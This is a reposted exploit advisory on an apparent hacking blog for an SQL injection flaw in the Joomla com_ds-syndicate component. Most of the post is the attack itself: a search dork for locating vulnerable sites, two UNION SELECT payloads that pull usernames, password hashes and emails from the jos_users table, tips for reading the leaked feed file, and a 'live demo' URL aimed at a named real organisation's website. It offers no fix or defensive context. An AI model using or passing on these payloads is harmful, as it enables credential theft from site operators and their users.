All about information from internet

You can get some information about internet from here

  • Home
  • About

20

Oct

Joomla com_ds-syndicate Sql-injetion vulnerability

Posted by admin  Published in Hacking

Play online games at GameDuell.
New Training Titles for Audio Software, Hardware & Technical Skills.
Shockwave has the game Risk! Buy it now!
Join LinkShare Today!
SYNC Outlook and Files on all your Computers
#############################################

#Joomla com_ds-syndicate Sql-injetion vulnerability #

#############################################

#[~] Author : boom3rang

#[~] HomePage: www.khg-crew.ws

#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er.

#[~] Kosova Hackers Group

#[!] Component_Name: ds-syndicate

#[!] Script_Name: Joomla

#[!] Google_Dork: inurl:”com_ds-syndicate”

#############################################

#[~] Exp: http://localhost/Path/index2.php?option=ds-syndicate&version=1&feed_id=[Exploit]

#[~] Exploit [1]: 1+union+all+select+1,concat(username,char(58),password,char(58),email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+jos_users–

#[~] Exploit [2]:

1+union+all+select+1,concat(username,char(58),password,char(58),email),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users–

#[!] Note:

If you get some file to download like feed or xml, download that file and open with some text editor to see informations like username and password, but first try exploits whithout downloding the file ;).

#[~] liveDemo:

http://www.esss.se/sv/index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,concat(username,char(58),password,char(58),email),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20+from+jos_users–

ps. here in this liveDemo you need to download file =feed1= .

#############################################

#[!] Proud 2 be Albanian

#[!] Proud 2 be Muslim

#[!] United States of Albania

#############################################

(Captured from milw0rm.com)

Related Articles

  • CMS by MyWorks Multiple Vulnerabilities (March 2nd, 2010)
  • phptroubleticket (id) SQL Injection Vulnerability (March 2nd, 2010)
  • Majoda CMS (Auth Bypass) SQL Injection Vulnerability (March 2nd, 2010)
  • Baykus Yemek Tarifleri <= 2.1 SQL Injection Vulnerability (March 2nd, 2010)
  • Joomla Component com_liveticker Blind SQL Injection Vulnerability (March 2nd, 2010)

No user responded in this post

Subscribe to this post comment rss or trackback url

Top Search

Recent Posts

  • CMS by MyWorks Multiple Vulnerabilities
  • phptroubleticket (id) SQL Injection Vulnerability
  • Majoda CMS (Auth Bypass) SQL Injection Vulnerability
  • Baykus Yemek Tarifleri <= 2.1 SQL Injection Vulnerability
  • Joomla Component com_liveticker Blind SQL Injection Vulnerability
  • Joomla Component com_yanc SQL Injection Vulnerability
  • HazelPress Lite <= 0.0.4 (Auth Bypass) SQL Injection Vulnerability
  • CPA Site Solutions Remote File Upload Vulnerability
  • fipsForum v2.6 Remote Database Disclosure Vulnerability
  • MOJO’s IWMS <= 7 SQL Injection & Cross Site Scripting

Site Information Details

Visitor

Sponsored

Discount Hotel Reservation - HotelClub












Your Ad Here




Categories

  • Games (16)
  • Hacking (190)
  • Software (96)
  • Virus (13)

Calendar

October 2008
M T W T F S S
    Nov »
 12345
6789101112
13141516171819
20212223242526
2728293031  

Archives

  • March 2010 (7)
  • February 2010 (25)
  • January 2010 (21)
  • December 2009 (18)
  • November 2009 (16)
  • October 2009 (6)
  • September 2009 (14)
  • August 2009 (16)
  • July 2009 (10)
  • June 2009 (3)
  • April 2009 (4)
  • March 2009 (3)
  • February 2009 (15)
  • January 2009 (29)
  • December 2008 (54)
  • November 2008 (44)
  • October 2008 (30)

Links

  • commercialfinancedirect.com
  • corporatefinancesite.com
  • financesite.us
  • frugallifeinsurance
  • hartagonogini.com
  • insureworksite
  • matdhulecrew.co.uk
  • openfinancecorp.com
  • oranger-pictureandphotograph
  • sale-store
  • Skin Care
  • Software Information Details
  • superfinancegroup.com

Recent Entries

  • CMS by MyWorks Multiple Vulnerabilities
  • phptroubleticket (id) SQL Injection Vulnerability
  • Majoda CMS (Auth Bypass) SQL Injection Vulnerability
  • Baykus Yemek Tarifleri
  • Joomla Component com_liveticker Blind SQL Injection Vulnerability
  • Joomla Component com_yanc SQL Injection Vulnerability
  • HazelPress Lite
  • CPA Site Solutions Remote File Upload Vulnerability
  • fipsForum v2.6 Remote Database Disclosure Vulnerability
  • MOJO’s IWMS

Recent Comments

  • sehummel in Joomla 1.5.x (Token) Remote Admin Change Password …
  • sehummel in Joomla Component com_ContentBlogList SQL Injection…
  • Usdating in phportal 1.0 Insecure Cookie Handling Vulnerabilit…
  • UnrewNescrect in phpBB3 addon prime_quick_style GetAdmin Exploit
  • AmandaOPD in Multi SEO phpBB 1.1.0 Remote File Inclusion Vulner…
  • CyclifyScieni in phpBB3 addon prime_quick_style GetAdmin Exploit
  • Tranny Sex Fest in SMF 1.1.6 Filter Post Bypass
  • bestgirls.com.ua in Set up Hotmail on the iPhone via Gmail
  • bestgirls.com.ua in Set up Hotmail on the iPhone via Gmail
  • Pramono Tunggul in How to Use John the Ripper
  • Random Selection of Posts

    • Joomla Component com_gameserver SQL Injection Vulnerability
    • PHP Store Real Estate Remote File Upload
    • Snif v1.5.2 - Any Filetype Download Exploit
    • Arab Network Tech. (ANT) CMS SQL Injection
    • PHP-Fusion Mod E-Cart Sql Injection
    • XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit
    • Shopmaker CMS (bSQL/LFI) Multiple Remote Vulnerabilities
© 2008 All about information from internet is proudly powered by WordPress
Theme designed by MILD-INFO.COM